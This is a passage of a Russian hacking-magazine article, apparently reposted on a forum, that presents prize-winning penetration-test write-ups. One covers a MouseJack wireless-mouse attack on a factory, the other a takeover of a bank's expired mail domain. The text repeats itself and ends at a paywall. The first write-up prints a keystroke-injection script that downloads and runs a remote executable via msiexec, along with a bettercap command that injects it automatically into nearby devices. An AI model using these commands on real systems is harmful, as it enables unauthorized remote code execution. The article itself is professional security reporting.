В августе 2023 года прошла церемония награждения Pentest Award — премии для специалистов по тестированию на проникновение. Мы опубликуем лучшие работы из каждой номинации и начнем с пробива периметра.
Компания Awillix учредила премию, чтобы этичные хакеры смогли громко заявить о себе и рассказать о своих достижениях. Для участия специалисты оставляли заявки с рассказом о своем лучшем проекте, где больше всего проявили смекалку, профессионализм и креатив.
В этой статье собраны райтапы, занявшие четвертое, третье и второе места в номинации «Пробив», а следом отдельной публикацией выйдет работа, взявшая первое место.
В 2020 году я участвовал в комплексном аудите беспроводных сетей на строгом режимном заводе. Мне удалось пробить периметр простым и оригинальным способом. Доступ к рабочему компьютеру сотрудника был получен прямо с улицы, по модели внешнего нарушителя и с использованием мобильного телефона.
На экране телефона можно видеть шелл, открытый на компьютере сотрудника, и приглашение во внутреннюю сеть завода. Этот кейс на 100% демонстрирует реальность атаки внешним нарушителем.
В основе атаки — уязвимость MouseJack, которая позволяет удаленно вводить текст через уязвимые адаптеры беспроводных мышек.
Для эксплуатации на подверженном ПК была набрана команда из следующего ducky-скетча:
GUI r DELAY 300 STRING msiexec /i
Эта команда работает на любой Windows, даже старой, имеет минимальную длину и за одно действие скачивает и запускает указанный исполняемый файл по HTTP.
Для реального пробива периметра потенциальному злоумышленнику требовалось лишь немного настроить телефон. Нужна автоматическая отправка вредоносных нажатий на каждую вновь найденную беспроводную мышку или клавиатуру. Это можно сделать такой командой:
sudo bettercap -eval «hid.recon on; events.on hid.device.new «hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt;«» 2> /dev/null
Теперь атакующий может убрать телефон в карман и неприметно прогуливаться вдоль периметра, пока ему на виртуалку прилетают шеллы.
Позже аналогичным образом мы пробивали периметры очень крупных и известных ИТ‑компаний. И каждый раз это мог быть внешний нарушитель, ничем не выделяющийся из толпы.
Уязвимость работает по радиоканалу, а это накладывает некоторые ограничения на радиус действия. Атаковать цели выше второго этажа сложно. Цели, находящиеся выше, можно атаковать с помощью дрона с прикрепленным к нему Raspberry Pi Zero и Crazyradio.
Эта уязвимость, найденная еще в 2016 году, по‑прежнему актуальна, так как имеет аппаратную природу. По моему мнению, это самая опасная из всех физических уязвимостей сегодня, поскольку она сразу же дает RCE на подверженных устройствах, эксплуатируется за секунду и несложна в эксплуатации.
Более подробно я писал о ней в статьях «Киберфон. Превращаем телефон на Android в инструмент хакера» и «Мегадрон. Строим хакерский беспилотник — дальнобойный и с защитой от глушилок».
Это краткая история о пентесте, который мы проводили по заказу одного из крупных банков. Точкой входа стало мобильное приложение для бизнеса.
Мы заметили, что домен для почты в приложении не совпадает с тем, который указан на сайте. Он вел на адрес в зоне .com, тогда как сайт находится в зоне .ru.
На главной странице домена из российского сегмента видим такое сообщение:
Оно говорит нам о том, что домен направлен на сайт, созданный при помощи конструктора Tilda. Регистрируемся в «Тильде», покупаем самый дешевый тариф и привязываем этот домен к своему сайту.
Смотрим, где хостится почта. Пишем dig somesecret.com MX и узнаём, что это Яндекс:
somesecret.com. 86400 IN MX 10 mx.yandex.net.
Теперь идем в Яндекс, говорим, что мы владелец домена, и подтверждаем владение через тег на главной странице.
В разделе «Контакты» нашлись предыдущие владельцы электронной почты.
Прежний владелец пытался восстановить пароль на сервисе intercom.io.
Таким образом мы обнаружили всех зарегистрированных пользователей и получили список компаний‑партнеров.
Дальше мы написали простой парсер сообщений, который искал чувствительные данные. Сложно было за что‑то зацепиться среди тысячи переписок. В одной из них нашлась почта, отличная от домена. Да, опять!
Домен уже другой и расположен в зоне .io.
Мы запустили брут поддоменов и нашли IP-адреса, которые ведут в облачные сервисы.
При переборе директорий на одном из найденных серверов мы нашли каталог /auth/, отображающий форму входа в «1С:Предприятие».
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее
9990 рублей 4000 р.
[TD]
920 р.
[/TD]
Я уже участник «Xakep.ru»
Компания Awillix учредила премию, чтобы этичные хакеры смогли громко заявить о себе и рассказать о своих достижениях. Для участия специалисты оставляли заявки с рассказом о своем лучшем проекте, где больше всего проявили смекалку, профессионализм и креатив.
В этой статье собраны райтапы, занявшие четвертое, третье и второе места в номинации «Пробив», а следом отдельной публикацией выйдет работа, взявшая первое место.
Четвертое место: «Взлом завода с телефона»
- Автор: s0i37
В 2020 году я участвовал в комплексном аудите беспроводных сетей на строгом режимном заводе. Мне удалось пробить периметр простым и оригинальным способом. Доступ к рабочему компьютеру сотрудника был получен прямо с улицы, по модели внешнего нарушителя и с использованием мобильного телефона.
На экране телефона можно видеть шелл, открытый на компьютере сотрудника, и приглашение во внутреннюю сеть завода. Этот кейс на 100% демонстрирует реальность атаки внешним нарушителем.
В основе атаки — уязвимость MouseJack, которая позволяет удаленно вводить текст через уязвимые адаптеры беспроводных мышек.
Для эксплуатации на подверженном ПК была набрана команда из следующего ducky-скетча:
GUI r DELAY 300 STRING msiexec /i
You do not have permission to view link please Вход or Регистрация
/quiet DELAY 300 ENTER DELAY 300 GUI SPACE DELAY 300 GUI r DELAY 300 STRING msiexec /i
You do not have permission to view link please Вход or Регистрация
/quiet DELAY 300 ENTERЭта команда работает на любой Windows, даже старой, имеет минимальную длину и за одно действие скачивает и запускает указанный исполняемый файл по HTTP.
Для реального пробива периметра потенциальному злоумышленнику требовалось лишь немного настроить телефон. Нужна автоматическая отправка вредоносных нажатий на каждую вновь найденную беспроводную мышку или клавиатуру. Это можно сделать такой командой:
sudo bettercap -eval «hid.recon on; events.on hid.device.new «hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt;«» 2> /dev/null
Теперь атакующий может убрать телефон в карман и неприметно прогуливаться вдоль периметра, пока ему на виртуалку прилетают шеллы.
Позже аналогичным образом мы пробивали периметры очень крупных и известных ИТ‑компаний. И каждый раз это мог быть внешний нарушитель, ничем не выделяющийся из толпы.
Уязвимость работает по радиоканалу, а это накладывает некоторые ограничения на радиус действия. Атаковать цели выше второго этажа сложно. Цели, находящиеся выше, можно атаковать с помощью дрона с прикрепленным к нему Raspberry Pi Zero и Crazyradio.
Эта уязвимость, найденная еще в 2016 году, по‑прежнему актуальна, так как имеет аппаратную природу. По моему мнению, это самая опасная из всех физических уязвимостей сегодня, поскольку она сразу же дает RCE на подверженных устройствах, эксплуатируется за секунду и несложна в эксплуатации.
Более подробно я писал о ней в статьях «Киберфон. Превращаем телефон на Android в инструмент хакера» и «Мегадрон. Строим хакерский беспилотник — дальнобойный и с защитой от глушилок».
Третье место: «Пробив одного из крупнейших банков через мобильное приложение»
- Автор: WizaXxX
Это краткая история о пентесте, который мы проводили по заказу одного из крупных банков. Точкой входа стало мобильное приложение для бизнеса.
Мы заметили, что домен для почты в приложении не совпадает с тем, который указан на сайте. Он вел на адрес в зоне .com, тогда как сайт находится в зоне .ru.
На главной странице домена из российского сегмента видим такое сообщение:
Оно говорит нам о том, что домен направлен на сайт, созданный при помощи конструктора Tilda. Регистрируемся в «Тильде», покупаем самый дешевый тариф и привязываем этот домен к своему сайту.
Смотрим, где хостится почта. Пишем dig somesecret.com MX и узнаём, что это Яндекс:
somesecret.com. 86400 IN MX 10 mx.yandex.net.
Теперь идем в Яндекс, говорим, что мы владелец домена, и подтверждаем владение через тег на главной странице.
В разделе «Контакты» нашлись предыдущие владельцы электронной почты.
Прежний владелец пытался восстановить пароль на сервисе intercom.io.
Таким образом мы обнаружили всех зарегистрированных пользователей и получили список компаний‑партнеров.
Дальше мы написали простой парсер сообщений, который искал чувствительные данные. Сложно было за что‑то зацепиться среди тысячи переписок. В одной из них нашлась почта, отличная от домена. Да, опять!
Домен уже другой и расположен в зоне .io.
Мы запустили брут поддоменов и нашли IP-адреса, которые ведут в облачные сервисы.
При переборе директорий на одном из найденных серверов мы нашли каталог /auth/, отображающий форму входа в «1С:Предприятие».
Присоединяйся к сообществу «Xakep.ru»!
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее
| -60% |
1 year
9990 рублей 4000 р.
[TD]
1 month_r
920 р.
[/TD]
Я уже участник «Xakep.ru»
